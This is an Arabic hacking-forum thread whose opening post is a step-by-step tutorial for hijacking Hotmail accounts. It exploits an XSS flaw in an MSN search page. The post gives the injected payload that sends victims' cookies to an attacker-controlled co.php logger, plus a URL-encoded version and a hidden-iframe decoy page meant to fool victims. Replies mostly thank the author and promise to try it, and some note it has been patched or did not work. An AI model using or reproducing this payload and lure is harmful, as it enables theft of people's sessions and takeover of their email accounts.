شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

[DR.THMoORY]

بسم الله الرحمن الرحيم..

طيب تمام اول شي نحمل ملف co.php
http://pastebin.com/mZCMRcGC
طيب نرفعه على الشل تممام
الحين نشوف الاستغلال..

http://glo.msn.com/search?searchTerm="><object data="javascript:********.location='http://www.site.com/co.php?c='.concat(escape(********.******));"></script>

احنا الحين نبدل site برابط الموقع إذا كان الملف co.php على الرئيسة لو مجلد تاني نضع بعد
/patch
patch=اسم المجلد
الحين كل ماعلينا هوا تشفير الكود
راح نشفر من بعد كلمة
searchTerm=
من بعد اليساوي.. نشوف يعني مثلآ كذا
"><object data="javascript:********.location='http://www.site.com/co.php?c='.concat(escape(********.******));"></script>
طيب راح نشفر بمقاياس
http full
عن طريق برنامج coder
نفتحه ونحط الكود ونشوف..

تم تشفير الكود الحين نبلدله بدل الكود الاول..
يعني الكود الاول من بعد اليساوي راح نحط هاد الي تشفر ..
الحين نعمل صفحه بلغه HtM نشوف.. من الشل..

الحين نضع داخل الملف..

الكود

<htm>
<h4>OwEnD By DR.THMOORY </h4>

<iframe id="rf" src="هنا نضع الكود الاستغلال " allowtransparency="true" style="display:none;" scrolling="auto"  frameborder="0">

مثل مانشوف اول جمله هادي خداع حتى لايشك يعني تقوله اخترقت هالموقع,,
والكود الثانيه..
نضع بعد src
كود الاستغلال الي عملنها قبل يصبح مثل كذا,,

http://glo.msn.com/search?searchTerm="%22%3E%3C%6F%62%6A%65%63%74%20%64%61%74%61%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%73%69%74%65%2E%63%6F%6D%2F%63%6F%2E%70%68%70%3F%63%3D%27%2E%63%6F%6E%63%61%74%28%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%29%3B%22%3E%3C%2F%73%63%72%69%70%74%3E

ونعمل save
الحين ندخل على صفحه thmooryالي عملته.. تابعو..

تمام الحين تم سحب الاي بي..+ الكوكيز +نوع المتصفح ونشوف ..
نرجع على المجلد الي كنا رافعين فيه co.php وراح نلقى ملف تكست اسمو
ok.txt

انتهى الشرح اتمنى انو عجبكم
الاكواد مرفقه شان الموقع يحجبهم..

​

 

[Saad Ghamdi]

نجرب ، يابطــل ، ونشوف ، ونرد لـك ، خبـر

^_^

 

[ReD-HaT]

ممم ما شاء الله
بعد التجريب لي رجعة
و مشكوور مسبقا
​

 

[Saad Ghamdi]

تم ترقيع ، هذه الثغره ، ولا ينفع ، والموضوع موجود بقوقل ،

يعيطيك الف ، عافيه ع الشرح ، ياكنق

 

[hack!n9]

نعم اتغرة مرة عليها ايام ولا بد من ان هوتميل لم تغفل عنها
مشكوووور عل بدل جهد بتوفيق

 

[ViRuS Qalaa]

مشكور ياغالي على الشرح الرائع
بارك الله فيك

​

 

[bleu moon]

تسلم يا غالي
رح اجربها ..

 

[المخترق الصغير]

نجرب و نشوف

شكرا لك اخيي

 

[الصراع]

رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

قديمه ولكن لك الشكر

 

[mohmal]

رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

a@mohmal.coma@mohmal.coma@mohmal.com

 

[hank00sh]

رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

مـــشكوور اخوي

انا بصراحه من زمان ودي اعرف الثغره هذي


تحياتي لك اخوي تقبل مروري

 

[مركيز]

رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

شكرا لك
لكن اشكل الكلمات مشفره

 

[badidous]

رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

i need it

 

[fighters]

رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

tnxxxx

 

[yabod]

رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

thanxxxxxxxxxxxxxx

 

[ssmba]

رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

machkourrrrrrrrr

 

[THE~BAD~BOY]

رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

9dimaaaaaaaaaaaa

 

[Dr.MwNs]

رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

مبدع وكلمة مبدع قليلة في حقك ^^

بسسس قبل لانجرب ونتعب
بالشرح اي كوكيز تقصد ؟
الباس مثلا او ؟

 

[Dr.MwNs]

رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

جربتها لكن ماطلع ملف بأسم ok.txt ^^

 

[toxicleo]

رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

هجرب وارد عليك